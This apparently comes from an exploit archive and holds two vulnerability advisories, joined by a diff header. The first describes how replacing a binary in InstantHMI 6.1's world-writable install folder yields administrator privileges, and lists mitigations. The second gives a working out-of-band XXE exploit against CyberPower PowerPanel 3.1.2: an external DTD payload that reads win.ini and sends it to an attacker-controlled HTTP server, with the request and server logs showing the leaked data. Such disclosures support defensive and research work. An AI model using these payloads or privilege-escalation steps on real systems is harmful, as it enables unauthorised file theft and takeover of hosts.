 Title: InstantHMI - EoP: User to ADMIN
 CWE Class: CWE-276: Incorrect Default Permissions
 Date: 01/06/2016
 Vendor: Software Horizons
 Product: InstantHMI
 Version: 6.1 
 Download link: http://www.instanthmi.com/ihmisoftware.htm
 Tested on: Windows 7 x86, fully patched
 Release mode: no bugbounty program, public release
 Installer Name: IHMI61-PCInstall-Unicode.exe
 MD5: ee3ca3181c51387d89de19e89aea0b31
 SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f
 - 1. Introduction: -
 During a standard installation (default option) the installer 
 automatically creates a folder named "IHMI-6" in the root drive. 
 No other location can be specified during standard installation.
 As this folder receives default permissions AUTHENTICATED USERS 
 are given the WRITE permission. 
 Because of this they can replace binaries or plant malicious 
 DLLs to obtain elevated, administrative level, privileges.
 - 2. Technical Details/PoC: -
 A. Obtain and execute the installer. 
 B. Observe there is no prompt for the installation location.
 C. Review permissions under the Explorer Security tab or run icacls.exe
 Example:
 IHMI-6 BUILTIN\Administrators:(I)(F)
       BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
       NT AUTHORITY\SYSTEM:(I)(F)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
       NT AUTHORITY\Authenticated Users:(I)(M)
       NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
 Successfully processed 1 files; Failed processing 0 files
 D. Change the main executable: InstantHMI.exe with a malicious copy. 
 E. Once executed by an administrator our code will run 
 under administrator level privileges.
 - 3. Mitigation: -
 A. Install under "c:\program files" or "C:\Program Files (x86)"
 B. set appropriate permissions on the application folder.
 - 4. Author: -
 sh4d0wman
--- a/platforms/xml/webapps/40077.txt
+++ b/platforms/xml/webapps/40077.txt
@ -0,0 +1,135 @@
 CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
 Vendor: CyberPower Systems, Inc.
 Product web page: https://www.cyberpowersystems.com
 Affected version: 3.1.2 (37567) Business Edition
 Summary: The PowerPanel® Business Edition software from
 CyberPower provides IT professionals with the tools they
 need to easily monitor and manage their backup power.
 Available for compatible CyberPower UPS models, this
 software supports up to 250 clients, allowing users remote
 access (from any network PC with a web browser) to instantly
 access vital UPS battery conditions, load levels, and runtime
 information. Functionality includes application/OS shutdown,
 event logging, hibernation mode, internal reports and analysis,
 remote management, and more.
 Desc: PowerPanel suffers from an unauthenticated XML External
 Entity (XXE) vulnerability using the DTD parameter entities
 technique resulting in disclosure and retrieval of arbitrary
 data on the affected node via out-of-band (OOB) attack. The
 vulnerability is triggered when input passed to the xmlservice
 servlet using the ppbe.xml script is not sanitized while parsing the
 xml inquiry payload returned by the JAXB element translation.
 ================================================================
 C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
 \web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
 ------------------------
 XmlServiceServlet.class:
 ------------------------
 94:  private InquirePayload splitInquirePayload(InputStream paramInputStream)
 95:    throws RequestException
 96:  {
 97:    try
 98:    {
 99:      JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
 100:     Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
 101:     JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
 102:     return (InquirePayload)localJAXBElement.getValue();
 103:   }
 104:   catch (JAXBException localJAXBException)
 105:   {
 106:     localJAXBException.printStackTrace();
 107:     throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
 108:   }
 109: }
 ---
 C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
 --------
 web.xml:
 --------
 28: <servlet>
 29: <servlet-name>xmlService</servlet-name>
 30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
 31: <load-on-startup>3</load-on-startup>
 32: </servlet>
 ..
 ..
 60: <servlet-mapping>
 61: <servlet-name>xmlService</servlet-name>
 62: <url-pattern>/ppbe.xml</url-pattern>
 63: </servlet-mapping>
 ================================================================
 Tested on: Microsoft Windows 7 Ultimate SP1 EN
           Microsoft Windows 8
           Microsoft Windows Server 2012
           Linux (64bit)
           MacOS X 10.6
           Jetty(7.5.0.v20110901)
           Java/1.8.0_91-b14
           SimpleHTTP/0.6 Python/2.7.1
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5338
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
 22.06.2016
 --
 C:\data\xxe.xml:
 ----------------
 <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
 <!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
 Request:
 --------
 POST /client/ppbe.xml HTTP/1.1
 Host: localhost:3052
 Content-Length: 258
 User-Agent: XXETester/1.0
 Connection: close
 <?xml version="1.0" encoding="UTF-8" ?>
 <!DOCTYPE zsl [
 <!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
 %remote;
 %root;
 %oob;]>
 <ppbe>
 <target>
 <command>action.notification.recipient.present</command>
 </target>
 <inquire />
 </ppbe>
 Response:
 ---------
 C:\data>python -m SimpleHTTPServer 8011
 Serving HTTP on 0.0.0.0 port 8011 ...
 lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
 lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
 lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -